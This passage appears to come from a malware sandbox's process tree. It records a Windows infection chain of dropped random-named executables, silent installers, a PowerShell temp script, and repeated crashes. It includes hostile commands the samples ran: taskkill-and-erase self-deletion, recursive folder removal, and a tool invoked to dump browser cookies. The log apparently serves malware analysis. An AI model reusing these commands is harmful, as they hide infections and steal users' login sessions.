                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\GeDMVDH7ESsgMQdfJaOxznfI.exe"
                                                                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                                                                            PID:6320
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\GeDMVDH7ESsgMQdfJaOxznfI.exe
                                                                                                                                                                                                                                                                                                                              "{path}"
                                                                                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                                                                                PID:6760
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\HsnbZEngGykxPWNtmQ6mmNP8.exe
                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\HsnbZEngGykxPWNtmQ6mmNP8.exe"
                                                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                                                                PID:6456
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\fDappMhWQZWKIhIQbnBkY0uu.exe
                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\fDappMhWQZWKIhIQbnBkY0uu.exe"
                                                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                                                  PID:6448
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\SunLabsPlayer.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\SunLabsPlayer.exe" /S
                                                                                                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                                                                                                      PID:5600
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi3DD2.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                                                                                                          PID:1852
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsi3DD2.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                                                                                                                            PID:352
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\fjJf0xB4coug6ZauBQeEBgRD.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\fjJf0xB4coug6ZauBQeEBgRD.exe"
                                                                                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                                                                                          PID:6468
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                                                                                                              PID:6644
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\sfgOH224HtEVddLX9rnaAYhP.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\sfgOH224HtEVddLX9rnaAYhP.exe"
                                                                                                                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                                                                                                                              PID:6360
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{pK2k-7MC0G-S78q-NtDfR}\42040229944.exe"
                                                                                                                                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                                                                                                                                  PID:7136
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\{pK2k-7MC0G-S78q-NtDfR}\42040229944.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\{pK2k-7MC0G-S78q-NtDfR}\42040229944.exe"
                                                                                                                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                                                                                                                      PID:6324
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\{pK2k-7MC0G-S78q-NtDfR}\42040229944.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\{pK2k-7MC0G-S78q-NtDfR}\42040229944.exe"
                                                                                                                                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                                                                                                                                          PID:4920
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{pK2k-7MC0G-S78q-NtDfR}\12381853825.exe" /mix
                                                                                                                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                                                                                                                        PID:6008
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\{pK2k-7MC0G-S78q-NtDfR}\12381853825.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\{pK2k-7MC0G-S78q-NtDfR}\12381853825.exe" /mix
                                                                                                                                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                                                                                                                                            PID:1320
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1320 -s 788
                                                                                                                                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                                                                              PID:5460
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1320 -s 852
                                                                                                                                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                                                                              PID:6160
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1320 -s 860
                                                                                                                                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                                                                              PID:5124
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1320 -s 704
                                                                                                                                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                                                                              PID:5256
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1320 -s 904
                                                                                                                                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                                                                              PID:5732
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1320 -s 912
                                                                                                                                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                                                                              PID:6160
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\kGWnDvRMi & timeout 3 & del /f /q "C:\Users\Admin\AppData\Local\Temp\{pK2k-7MC0G-S78q-NtDfR}\12381853825.exe"
                                                                                                                                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                                                                                                                                PID:1756
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                  timeout 3
                                                                                                                                                                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                  PID:7152
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{pK2k-7MC0G-S78q-NtDfR}\97579734288.exe" /mix
                                                                                                                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                                                                                                                              PID:4968
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\{pK2k-7MC0G-S78q-NtDfR}\97579734288.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\{pK2k-7MC0G-S78q-NtDfR}\97579734288.exe" /mix
                                                                                                                                                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:4684
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4684 -s 756
                                                                                                                                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                                                                    PID:3664
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4684 -s 768
                                                                                                                                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                                                                    PID:6484
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4684 -s 980
                                                                                                                                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                                                                    PID:6168
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4684 -s 948
                                                                                                                                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                                                                    PID:1680
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4684 -s 1384
                                                                                                                                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                                                                    PID:676
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4684 -s 1372
                                                                                                                                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                                                                    PID:6756
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4684 -s 1600
                                                                                                                                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                                                                    PID:8148
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\nailedp\edspolishpp.exe
                                                                                                                                                                                                                                                                                                                                                                    edspolishpp.exe
                                                                                                                                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:1504
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "sfgOH224HtEVddLX9rnaAYhP.exe" /f & erase "C:\Users\Admin\AppData\Roaming\sfgOH224HtEVddLX9rnaAYhP.exe" & exit
                                                                                                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:6692
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                      taskkill /im "sfgOH224HtEVddLX9rnaAYhP.exe" /f
                                                                                                                                                                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                      PID:4728
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "1_4924807894722937236.exe" /f & erase "C:\Program Files (x86)\Microsoft Data\Versium Research\1_4924807894722937236.exe" & exit
                                                                                                                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:6540
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                      taskkill /im "1_4924807894722937236.exe" /f
                                                                                                                                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                      PID:6756
                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft Data\Versium Research\dp81GdX0OrCQ.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft Data\Versium Research\dp81GdX0OrCQ.exe"
                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:5724
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:5340
                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft Data\Versium Research\BarSetpFile.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft Data\Versium Research\BarSetpFile.exe"
                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:5496
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\8586842.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\8586842.exe"
                                                                                                                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:5780
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5780 -s 1792
                                                                                                                                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                                                                                              PID:4324
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\3989356.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\3989356.exe"
                                                                                                                                                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:4880
                                                                                                                                                                                                                                                                                                                                                                              • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:6888
                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\2235894.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\2235894.exe"
                                                                                                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:5532
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5532 -s 1296
                                                                                                                                                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                                                                                    PID:2884
                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft Data\Versium Research\lylal220.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft Data\Versium Research\lylal220.exe"
                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:1756
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-P4DPK.tmp\lylal220.tmp
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-P4DPK.tmp\lylal220.tmp" /SL5="$20388,237286,153600,C:\Program Files (x86)\Microsoft Data\Versium Research\lylal220.exe"
                                                                                                                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:5884
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-GMTNT.tmp\4_177039.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-GMTNT.tmp\4_177039.exe" /S /UID=lylal220
                                                                                                                                                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:5700
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Java\YCSXWEGJWR\irecord.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files\Java\YCSXWEGJWR\irecord.exe" /VERYSILENT
                                                                                                                                                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:6612
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-HIGBB.tmp\irecord.tmp
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-HIGBB.tmp\irecord.tmp" /SL5="$20564,6139911,56832,C:\Program Files\Java\YCSXWEGJWR\irecord.exe" /VERYSILENT
                                                                                                                                                                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:5048
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\recording\i-record.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\recording\i-record.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:5416
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\c3-13188-49f-9669d-15c1203ced9b3\SHaejypaesaela.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\c3-13188-49f-9669d-15c1203ced9b3\SHaejypaesaela.exe"
                                                                                                                                                                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:5712
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                                                                                                                                                                                                                                                      dw20.exe -x -s 1936
                                                                                                                                                                                                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:3976
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\65-d1665-b80-4bf8e-151042741dfef\Coqeqorile.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\65-d1665-b80-4bf8e-151042741dfef\Coqeqorile.exe"
                                                                                                                                                                                                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:4988
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ipw2ltzx.loo\sskiper.exe /s & exit
                                                                                                                                                                                                                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:6700
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\ipw2ltzx.loo\sskiper.exe
                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\ipw2ltzx.loo\sskiper.exe /s
                                                                                                                                                                                                                                                                                                                                                                                                              15⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:5088
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1628944903.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\1628944903.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7432
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6276
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        17⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7064
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\773639586.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\773639586.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7680
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bq3x3yj4.obv\KiffMainE1.exe & exit
                                                                                                                                                                                                                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5700
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\bq3x3yj4.obv\KiffMainE1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\bq3x3yj4.obv\KiffMainE1.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          15⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:812
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              dw20.exe -x -s 1200
                                                                                                                                                                                                                                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6512
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\js2djnmg.zoe\001.exe & exit
                                                                                                                                                                                                                                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4032
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\js2djnmg.zoe\001.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\js2djnmg.zoe\001.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                15⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5848
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\inw2pado.sx4\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6688
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\inw2pado.sx4\installer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\inw2pado.sx4\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3168
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2hcvvi0o.fpn\gpooe.exe & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4624
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\2hcvvi0o.fpn\gpooe.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\2hcvvi0o.fpn\gpooe.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        15⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2100
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                            16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8064
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7632
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2008
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jng3xkhv.gca\sskiper.exe /s & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5320
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jng3xkhv.gca\sskiper.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jng3xkhv.gca\sskiper.exe /s
                                                                                                                                                                                                                                                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7452
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sdbjeubw.ti4\google-game.exe & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3784
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\sdbjeubw.ti4\google-game.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\sdbjeubw.ti4\google-game.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7896
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                                                                                                                                                                                                                                                                                                                                                                                                                          16⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1964
